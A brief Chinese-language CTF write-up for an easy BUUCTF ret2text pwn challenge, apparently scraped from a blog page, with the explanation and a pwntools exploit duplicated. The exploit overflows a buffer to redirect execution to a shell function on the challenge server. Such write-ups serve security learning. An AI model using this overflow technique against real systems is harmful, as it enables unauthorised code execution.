checksec

IDA

这题没有什么过多解释的,就是一道简单的ret2text,有shell的地址
应该是太简单了做的人少就放在了BUUCTF的第二页,按照顺序做的,也就写上了
EXP
from pwn import*
r=remote('node4.buuoj.cn',27245)
shell_addr=0x804851B
payload='a'*(0x18+4)+p32(shell_addr)
r.sendline(payload)
r.interactive()


这题没有什么过多解释的,就是一道简单的ret2text,有shell的地址
应该是太简单了做的人少就放在了BUUCTF的第二页,按照顺序做的,也就写上了
from pwn import*
r=remote('node4.buuoj.cn',27245)
shell_addr=0x804851B
payload='a'*(0x18+4)+p32(shell_addr)
r.sendline(payload)
r.interactive()
359
392
1778

被折叠的 条评论
为什么被折叠?